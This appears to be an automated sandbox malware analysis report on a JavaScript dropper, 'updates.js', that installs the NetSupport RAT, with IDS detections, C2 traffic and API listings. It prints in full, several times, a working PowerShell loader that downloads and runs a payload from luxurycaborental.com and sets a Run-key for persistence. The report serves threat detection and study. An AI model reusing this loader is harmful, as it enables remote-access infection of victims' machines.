"Add-Type"ParameterBinding(Add-Type): name="AssemblyName"; value="System.IO.Compression.FileSystem", Source: Microsoft-Windows-PowerShell, UserData: , data0: Severity = Informational Host Name = ConsoleHost Host Version = 5.1.19041.1682 Host ID = c4c2d99d-dce2-4c63-9b01-d2d05392ab2f Host Application = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Ex Bypass -NoP -C $UETAMVCS='http://luxurycaborental.com/cdn-vs/data.php?12105';$XAJCG=(New-Object System.Net.WebClient).DownloadString($UETAMVCS);$OTZWZ=[System.Convert]::FromBase64String($XAJCG);$asd = Get-Random -Minimum -10 -Maximum 37; $ZPLWC=[System.Environment]::GetFolderPath('ApplicationData')+'\QCHBWPB'+$asd;if (!(Test-Path $ZPLWC -PathType Container)) { New-Item -Path $ZPLWC -ItemType Directory };$p=Join-Path $ZPLWC 'tttt.zip';[System.IO.File]::WriteAllBytes($p,$OTZWZ);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$ZPLWC)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $ZPLWC 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $ZPLWC -Force; $fd.attributes='Hidden';$s=$ZPLWC+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='BTGEEENA';$DS='String';New-ItemPrope
                                Sigma detected: Usage Of Web Request Commands And Cmdlets
                                Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $UETAMVCS='http://luxurycaborental.com/cdn-vs/data.php?12105';$XAJCG=(New-Object System.Net.WebClient).DownloadString($UETAMVCS);$OTZWZ=[System.Convert]::FromBase64String($XAJCG);$asd = Get-Random -Minimum -10 -Maximum 37; $ZPLWC=[System.Environment]::GetFolderPath('ApplicationData')+'\QCHBWPB'+$asd;if (!(Test-Path $ZPLWC -PathType Container)) { New-Item -Path $ZPLWC -ItemType Directory };$p=Join-Path $ZPLWC 'tttt.zip';[System.IO.File]::WriteAllBytes($p,$OTZWZ);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$ZPLWC)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $ZPLWC 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $ZPLWC -Force; $fd.attributes='Hidden';$s=$ZPLWC+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='BTGEEENA';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $UETAMVCS='http://luxurycaborental.com/cdn-vs/data.php?12105';$XAJCG=(New-Object System.Net.WebClient).DownloadString($UETAMVCS);$OTZWZ=[System.Convert]::FromBase64String($XAJCG);$asd = Get-Random -Minimum -10 -Maximum 37; $ZPLWC=[System.Environment]::GetFolderPath('ApplicationData')+'\QCHBWPB'+$asd;if (!(Test-Path $ZPLWC -PathType Container)) { New-Item -Path $ZPLWC -ItemType Directory };$p=Join-Path $ZPLWC 'tttt.zip';[System.IO.File]::WriteAllBytes($p,$OTZWZ);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$ZPLWC)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $ZPLWC 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $ZPLWC -Force; $fd.attributes='Hidden';$s=$ZPLWC+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='BTGEEENA';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;, CommandLine|base64offset|contains: L, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\updates.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 5972, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $UETAMVCS='http://luxurycaborental.com/cdn-vs/data.php?12105';$XAJCG=(New-Object System.Net.WebClient).DownloadString($UETAMVCS);$OTZWZ=[System.Convert]::FromBase64String($XAJCG);$asd = Get-Random -Minimum -10 -Maximum 37; $ZPLWC=[System.Environment]::GetFolderPath('ApplicationData')+'\QCHBWPB'+$asd;if
                                Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                                Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\updates.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\updates.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\updates.js", ProcessId: 5972, ProcessName: wscript.exe
                                Sigma detected: Non Interactive PowerShell Process Spawned
                                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $UETAMVCS='http://luxurycaborental.com/cdn-vs/data.php?12105';$XAJCG=(New-Object System.Net.WebClient).DownloadString($UETAMVCS);$OTZWZ=[System.Convert]::FromBase64String($XAJCG);$asd = Get-Random -Minimum -10 -Maximum 37; $ZPLWC=[System.Environment]::GetFolderPath('ApplicationData')+'\QCHBWPB'+$asd;if (!(Test-Path $ZPLWC -PathType Container)) { New-Item -Path $ZPLWC -ItemType Directory };$p=Join-Path $ZPLWC 'tttt.zip';[System.IO.File]::WriteAllBytes($p,$OTZWZ);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$ZPLWC)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $ZPLWC 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $ZPLWC -Force; $fd.attributes='Hidden';$s=$ZPLWC+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='BTGEEENA';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $UETAMVCS='http://luxurycaborental.com/cdn-vs/data.php?12105';$XAJCG=(New-Object System.Net.WebClient).DownloadString($UETAMVCS);$OTZWZ=[System.Convert]::FromBase64String($XAJCG);$asd = Get-Random -Minimum -10 -Maximum 37; $ZPLWC=[System.Environment]::GetFolderPath('ApplicationData')+'\QCHBWPB'+$asd;if (!(Test-Path $ZPLWC -PathType Container)) { New-Item -Path $ZPLWC -ItemType Directory };$p=Join-Path $ZPLWC 'tttt.zip';[System.IO.File]::WriteAllBytes($p,$OTZWZ);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$ZPLWC)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $ZPLWC 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $ZPLWC -Force; $fd.attributes='Hidden';$s=$ZPLWC+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='BTGEEENA';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;, CommandLine|base64offset|contains: L, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\updates.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 5972, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $UETAMVCS='http://luxurycaborental.com/cdn-vs/data.php?12105';$XAJCG=(New-Object System.Net.WebClient).DownloadString($UETAMVCS);$OTZWZ=[System.Convert]::FromBase64String($XAJCG);$asd = Get-Random -Minimum -10 -Maximum 37; $ZPLWC=[System.Environment]::GetFolderPath('ApplicationData')+'\QCHBWPB'+$asd;if

                                Remote Access Functionality

                                barindex
                                Sigma detected: Powershell drops NetSupport RAT client
                                Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 612, TargetFilename: C:\Users\user\AppData\Roaming\QCHBWPB-9\NSM.LIC

                                Snort Signatures

                                Timestamp:07/17/24-15:19:55.846593
                                SID:2054434
                                Source Port:62382
                                Destination Port:53
                                Protocol:UDP
                                Classtype:A Network Trojan was detected

                                Suricata Signatures

                                Timestamp:2024-07-17T15:19:43.805193+0200
                                SID:2827745
                                Source Port:49705
                                Destination Port:443
                                Protocol:TCP
                                Classtype:Malware Command and Control Activity Detected
                                Timestamp:2024-07-17T15:19:55.846593+0200
                                SID:2054434
                                Source Port:62382
                                Destination Port:53
                                Protocol:UDP
                                Classtype:Exploit Kit Activity Detected

                                Joe Sandbox Signatures

                                Click to jump to signature section

                                Show All Signature Results

                                AV Detection

                                barindex
                                Antivirus detection for URL or domain
                                Source: http://luxurycaborental.com/cAvira URL Cloud: Label: malware
                                Source: http://luxurycaborental.com/cdn-vs/data.php?12105Avira URL Cloud: Label: malware
                                Multi AV Scanner detection for dropped file
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\HTCTL32.DLLReversingLabs: Detection: 13%
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeReversingLabs: Detection: 26%
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\remcmdstub.exeReversingLabs: Detection: 23%
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_110ADA40 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,_malloc,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,4_2_110ADA40
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 6_2_110ADA40 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,_malloc,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,6_2_110ADA40
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\QCHBWPB-9\msvcr100.dllJump to behavior
                                Source: Binary string: msvcr100.i386.pdb source: client32.exe
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_111273E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,4_2_111273E0
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_1102D9F4 Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,4_2_1102D9F4
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_1102DD21 CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,4_2_1102DD21
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_1110BD70 _memset,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,4_2_1110BD70
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_110663B0 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,4_2_110663B0
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_1106ABD0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,4_2_1106ABD0
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 6_2_1102D900 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,FindCloseChangeNotification,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,6_2_1102D900
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 6_2_111273E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,6_2_111273E0
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 6_2_1110BD70 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,6_2_1110BD70
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 6_2_110663B0 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,6_2_110663B0
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 6_2_1106ABD0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,6_2_1106ABD0

                                Software Vulnerabilities

                                barindex
                                Suspicious execution chain found
                                Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                                Networking

                                barindex
                                Snort IDS alert for network traffic
                                Source: TrafficSnort IDS: 2054434 ET CURRENT_EVENTS ZPHP Domain in DNS Lookup (luxurycaborental .com) 192.168.2.5:62382 -> 1.1.1.1:53
                                Source: global trafficHTTP traffic detected: GET /cdn-vs/data.php?12105 HTTP/1.1Host: luxurycaborental.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: Joe Sandbox ViewIP Address: 104.26.0.231 104.26.0.231
                                Source: Joe Sandbox ViewASN Name: COGENT-174US COGENT-174US
                                Source: unknownTCP traffic detected without corresponding DNS query: 194.180.191.69
                                Source: unknownTCP traffic detected without corresponding DNS query: 194.180.191.69
                                Source: unknownTCP traffic detected without corresponding DNS query: 194.180.191.69
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: global trafficHTTP traffic detected: GET /cdn-vs/data.php?12105 HTTP/1.1Host: luxurycaborental.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: global trafficDNS traffic detected: DNS query: luxurycaborental.com
                                Source: global trafficDNS traffic detected: DNS query: geo.netsupportsoftware.com
                                Source: unknownHTTP traffic detected: POST http://194.180.191.69/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 194.180.191.69Connection: Keep-AliveCMD=POLLINFO=1ACK=1Data Raw: Data Ascii:
                                Source: client32.exeString found in binary or memory: http://%s/fakeurl.htm
                                Source: client32.exeString found in binary or memory: http://%s/testpage.htm
                                Source: wscript.exe, 00000000.00000003.2116329159.0000027C61D58000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2114675295.0000027C60EA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2115464380.0000027C5F890000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://0.30000000000000004.com/
                                Source: client32.exeString found in binary or memory: http://127.0.0.1
                                Source: client32.exeString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp
                                Source: wscript.exeString found in binary or memory: http://luxurycaborental.com/c
                                Source: wscript.exe, 00000000.00000003.2122640509.0000027C6401A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://luxurycaborental.com/cdn-vs/data.php?12105
                                Source: wscript.exe, 00000000.00000003.2116329159.0000027C61D58000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2114675295.0000027C618A6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2114675295.0000027C60EA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2116329159.0000027C62758000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2115464380.0000027C5F890000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://stat.ethz.ch/R-manual/R-devel/library/grDevices/html/boxplot.stats.html
                                Source: wscript.exe, 00000000.00000003.2115464380.0000027C5F890000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                                Source: wscript.exe, 00000000.00000003.2116329159.0000027C61D58000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2114675295.0000027C60EA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2115464380.0000027C5F890000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/CanvasRenderingContext2D/globalsCompositeOperation
                                Source: wscript.exe, 00000000.00000003.2116329159.0000027C61D58000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2114675295.0000027C60EA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2115464380.0000027C5F890000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/CanvasRenderingContext2D/variableCompositeOperation
                                Source: wscript.exe, 00000000.00000003.2116329159.0000027C61D58000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2114675295.0000027C60EA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2115464380.0000027C5F890000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/Events/mousewheel)
                                Source: wscript.exe, 00000000.00000003.2116329159.0000027C61D58000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2114675295.0000027C618A6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2114675295.0000027C60EA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2116329159.0000027C62758000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2115464380.0000027C5F890000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://echarts.apache.org/examples/en/editor.html?c=custom-gantt-flight
                                Source: wscript.exe, 00000000.00000003.2116329159.0000027C61D58000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2114675295.0000027C60EA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2115464380.0000027C5F890000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/apache/echarts/issues/14266
                                Source: wscript.exe, 00000000.00000003.2116329159.0000027C61D58000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2114675295.0000027C60EA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2115464380.0000027C5F890000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/apache/incubator-echarts/issues/11369
                                Source: wscript.exe, 00000000.00000003.2116329159.0000027C61D58000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2114675295.0000027C60EA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2115464380.0000027C5F890000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/apache/incubator-echarts/issues/12229
                                Source: wscript.exe, 00000000.00000003.2116329159.0000027C61D58000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2114675295.0000027C618A6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2114675295.0000027C60EA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2116329159.0000027C62758000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2115464380.0000027C5F890000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/d3/d3-hierarchy/blob/4c1f038f2725d6eae2e49b61d01456400694bac4/src/tree.js
                                Source: wscript.exe, 00000000.00000003.2116329159.0000027C61D58000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2114675295.0000027C60EA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2115464380.0000027C5F890000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/d3/d3/blob/9cc9a875e636a1dcf36cc1e07bdf77e1ad6e2c74/src/arrays/quantile.js
                                Source: wscript.exe, 00000000.00000003.2116329159.0000027C61D58000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2114675295.0000027C618A6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2114675295.0000027C60EA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2116329159.0000027C62758000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2115464380.0000027C5F890000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/d3/d3/blob/9cc9a875e636a1dcf36cc1e07bdf77e1ad6e2c74/src/layout/treemap.js
                                Source: wscript.exe, 00000000.00000003.2116329159.0000027C61D58000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2114675295.0000027C618A6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2114675295.0000027C60EA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2116329159.0000027C62758000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2115464380.0000027C5F890000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/d3/d3/blob/b516d77fb8566b576088e73410437494717ada26/src/layout/force.js
                                Source: wscript.exe, 00000000.00000003.2116329159.0000027C61D58000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2114675295.0000027C60EA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2115464380.0000027C5F890000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/d3/d3/blob/b516d77fb8566b576088e73410437494717ada26/src/time/scale.js
                                Source: wscript.exe, 00000000.00000003.2116329159.0000027C61D58000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2114675295.0000027C60EA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2115464380.0000027C5F890000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/ecomfe/zrender/blob/master/LICENSE.txt
                                Source: wscript.exe, 00000000.00000003.2116329159.0000027C61D58000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2114675295.0000027C618A6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2114675295.0000027C60EA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2116329159.0000027C62758000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2115464380.0000027C5F890000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://graphics.ethz.ch/teaching/scivis_common/Literature/squarifiedTreeMaps.pdf
                                Source: wscript.exe, 00000000.00000003.2116329159.0000027C61D58000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2114675295.0000027C60EA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2115464380.0000027C5F890000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jsbench.me/2vkpcekkvw/1)
                                Source: wscript.exe, 00000000.00000003.2116329159.0000027C61D58000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2114675295.0000027C60EA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2115464380.0000027C5F890000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jsperf.com/try-catch-performance-overhead
                                Source: wscript.exe, 00000000.00000003.2116329159.0000027C61D58000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2114675295.0000027C60EA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2115464380.0000027C5F890000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://momentjs.com/
                                Source: wscript.exe, 00000000.00000003.2116329159.0000027C61D58000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2114675295.0000027C60EA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2115464380.0000027C5F890000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tc39.github.io/ecma262/#sec-daylight-saving-time-adjustment).
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_1101FC20 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,4_2_1101FC20
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_110335A0 GetClipboardFormatNameA,SetClipboardData,4_2_110335A0
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_1101FC20 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,4_2_1101FC20
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 6_2_110335A0 GetClipboardFormatNameA,SetClipboardData,6_2_110335A0
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 6_2_1101FC20 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,6_2_1101FC20
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_11033320 IsClipboardFormatAvailable,GetClipboardData,GetClipboardFormatNameA,GetLastError,GlobalUnlock,4_2_11033320
